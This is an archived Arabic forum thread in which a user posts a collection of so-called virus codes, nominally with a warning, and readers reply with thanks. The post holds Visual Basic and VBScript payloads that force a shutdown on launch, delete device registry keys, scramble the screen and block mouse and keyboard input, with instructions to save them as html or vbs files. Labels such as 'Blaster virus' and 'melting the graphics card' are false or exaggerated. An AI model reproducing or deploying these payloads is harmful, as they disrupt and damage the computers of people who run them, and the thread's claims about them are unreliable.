المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : اكواد فيروسات ...


الجـــــوري
03-03-2008, 09:26 PM
هذ مجموعة اكواد خطيرة ارجو عدم العبث بها واخذ الحذر منها


1- كود فيروس بلاستر
رمز:
Shutdown Flags Const EWX_LOGOFF = 0 Const EWX_SHUTDOWN = 1 Const EWX_REBOOT = 2 Const EWX_FORCE = 4 Const SE_PRIVILEGE_ENABLED = &H2 Const TokenPrivileges = 3 Const TOKEN_ASSIGN_PRIMARY = &H1 Const TOKEN_DUPLICATE = &H2 Const TOKEN_IMPERSONATE = &H4 Const TOKEN_QUERY = &H8 Const TOKEN_QUERY_SOURCE = &H10 Const TOKEN_ADJUST_PRIVILEGES = &H20 Const TOKEN_ADJUST_GROUPS = &H40 Const TOKEN_ADJUST_DEFAULT = &H80 Const SE_SHUTDOWN_NAME = "SeShutdownPrivilege" Const ANYSIZE_ARRAY = 1 Private Type LARGE_INTEGER lowpart As Long highpart As Long End Type Private Type Luid lowpart As Long highpart As Long End Type Private Type LUID_AND_ATTRIBUTES 'pLuid As Luid pLuid As LARGE_INTEGER Attributes As Long End Type Private Type TOKEN_PRIVILEGES PrivilegeCount As Long Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES End Type Private Declare Function InitiateSystemShutdown Lib "advapi32.dll" Alias "InitiateSystemShutdownA" (ByVal lpMachineName As String, ByVal lpMessage As String, ByVal dwTimeout As Long, ByVal bForceAppsClosed As Long, ByVal bRebootAfterShutdown As Long) As Long Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long Private Declare Function GetCurrentProcess Lib "kernel32" () As Long Private Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LARGE_INTEGER) As Long Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" (ByVal lpBuffer As String, nSize As Long) As Long Private Declare Function GetLastError Lib "kernel32" () As Long Public Function InitiateShutdownMachine(ByVal Machine As String, Optional Force As Variant, Optional Restart As Variant, Optional AllowLocalShutdown As Variant, Optional Delay As Variant, Optional Message As Variant) As Boolean Dim hProc As Long Dim OldTokenStuff As TOKEN_PRIVILEGES Dim OldTokenStuffLen As Long Dim NewTokenStuff As TOKEN_PRIVILEGES Dim NewTokenStuffLen As Long Dim pSize As Long If IsMissing(Force) Then Force = False If IsMissing(Restart) Then Restart = True If IsMissing(AllowLocalShutdown) Then AllowLocalShutdown = False If IsMissing(Delay) Then Delay = 0 If IsMissing(Message) Then Message = "" 'Make sure the Machine-name doesn't start with '\' If InStr(Machine, "\\") = 1 Then Machine = Right(Machine, Len(Machine) - 2) End If 'check if it's the local machine that's going to be shutdown If (LCase(GetMyMachineName) = LCase(Machine)) Then 'may we shut this computer down? If AllowLocalShutdown = False Then Exit Function 'open access token If OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hProc) = 0 Then MsgBox "OpenProcessToken Error: " & GetLastError() Exit Function End If 'retrieve the locally unique identifier to represent the Shutdown-privilege name If LookupPrivilegeValue(vbNullString, SE_SHUTDOWN_NAME, OldTokenStuff.Privileges(0).pLuid) = 0 Then MsgBox "LookupPrivilegeValue Error: " & GetLastError() Exit Function End If NewTokenStuff = OldTokenStuff NewTokenStuff.PrivilegeCount = 1 NewTokenStuff.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED NewTokenStuffLen = Len(NewTokenStuff) pSize = Len(NewTokenStuff) 'Enable shutdown-privilege If AdjustTokenPrivileges(hProc, False, NewTokenStuff, NewTokenStuffLen, OldTokenStuff, OldTokenStuffLen) = 0 Then MsgBox "AdjustTokenPrivileges Error: " & GetLastError() Exit Function End If 'initiate the system shutdown If InitiateSystemShutdown("\\" & Machine, Message, Delay, Force, Restart) = 0 Then Exit Function End If NewTokenStuff.Privileges(0).Attributes = 0 'Disable shutdown-privilege If AdjustTokenPrivileges(hProc, False, NewTokenStuff, Len(NewTokenStuff), OldTokenStuff, Len(OldTokenStuff)) = 0 Then Exit Function End If Else 'initiate the system shutdown If InitiateSystemShutdown("\\" & Machine, Message, Delay, Force, Restart) = 0 Then Exit Function End If End If InitiateShutdownMachine = True End Function Function GetMyMachineName() As String Dim sLen As Long 'create a buffer GetMyMachineName = Space(100) sLen = 100 'retrieve the computer name If GetComputerName(GetMyMachineName, sLen) Then GetMyMachineName = Left(GetMyMachineName, sLen) End If End Function Private Sub Form_Load() InitiateShutdownMachine GetMyMachineName, True, True, True, 60, "You initiated a system shutdown..." End Sub

2- كود تعطيل القرص الصلب

رمز:
<****** ********="VB******"> set Wsh****l = CreateObject("W******.****l") Wsh****l.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\Class\PCMIA\" </******>

3- كود تعطيل كرت الشاشة

رمز:
<****** ********="VB******"> set Wsh****l = CreateObject("W******.****l") Wsh****l.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\Class\Monitor\" </******>

4- كود لتعطيل المودم

رمز:
<****** ********="VB******"> set Wsh****l = CreateObject("W******.****l") Wsh****l.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\Class\Modem\" </******>

5- كود لتعطيل لوحة المفاتيح

رمز:
<****** ********="VB******"> set Wsh****l = CreateObject("W******.****l") Wsh****l.RegDelete"HKEY_CURRENT_USER\System\Curren tControlSet\Services\Keyboard\" </******>

6- كود لصهر كرت الشاشة

رمز:
Private Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long Private Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long Private Sub Form_KeyDown(KeyCode As Integer, Shift As Integer) If KeyCode = vbKeyEscape Then Unload Me End Sub Private Sub Form_Load() Dim lngDC As Long Dim intWidth As Integer, intHeight As Integer Dim intX As Integer, intY As Integer lngDC = GetDC(0) intWidth = Screen.Width / Screen.TwipsPerPixelX intHeight = Screen.Height / Screen.TwipsPerPixelY form1.Width = intWidth * 15 form1.Height = intHeight * 15 Call BitBlt(hDC, 0, 0, intWidth, intHeight, lngDC, 0, 0, vbSrcCopy) form1.Visible = vbTrue Do intX = (intWidth - 128) * Rnd intY = (intHeight - 128) * Rnd Call BitBlt(lngDC, intX, intY + 1, 128, 128, lngDC, intX, intY, vbSrcCopy) DoEvents Loop End Sub Private Sub Form_Unload(Cancel As Integer) Set form1 = Nothing End End Sub

7- كود لإيقاف الفأرة و لوحة المفاتيح

رمز:
Private Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) Private Sub Form_Activate() DoEvents BlockInput True Sleep 1000 BlockInput False End Sub
تحفضها بامتداد html أو vbs
-----------------------------------
م/ل

ابونوره
03-03-2008, 10:18 PM
الله يبعد عنا الفيروسات

مشكورة على المشاركة يا الجوري

الجـــــوري
03-03-2008, 10:31 PM
الله يبعد عنا الفيروسات

مشكورة على المشاركة يا الجوري

آآآمين اخوي وشاكره لك المرور

webmaster
04-03-2008, 12:36 AM
بارك الله فيك الجوري

وشكرآ لك على طرح الفائدة للجميع

الجـــــوري
04-03-2008, 01:51 AM
بارك الله فيك الجوري

وشكرآ لك على طرح الفائدة للجميع

شاكره مرورك اخوي ابراهيم

FPI
04-03-2008, 01:53 AM
يعطيك العافية الجوري

الجـــــوري
04-03-2008, 02:03 AM
يعطيك العافية الجوري

Xg_5 شاكره لك المرور اخوي

بنت الوادي
04-03-2008, 09:05 AM
مشكورة الجوري

المسافر
04-03-2008, 11:52 AM
موضوع هام ورائع ... الجوري لايومن انتي من صمم هذه الفايروسات .. بصراحة تخوفين ..

al.shihabi
04-03-2008, 02:42 PM
شكرا الجوري على الموضوع

والتحذير من الشر الخطير ههههههههه

بس كلامك غير تقولين

هذ مجموعة اكواد جطيرة ارجو عدم العبث بها واخذ الحذر منها

شكرا لك وبارك الله في جهودك المتواصلة

الكناني
04-03-2008, 03:58 PM
الله يبعدنا عن الفيروسات ومشكورة أختي الجــــــوري ويعطيك العافية

الجـــــوري
04-03-2008, 05:19 PM
شاكره للجميع التواجد الله يعافيكم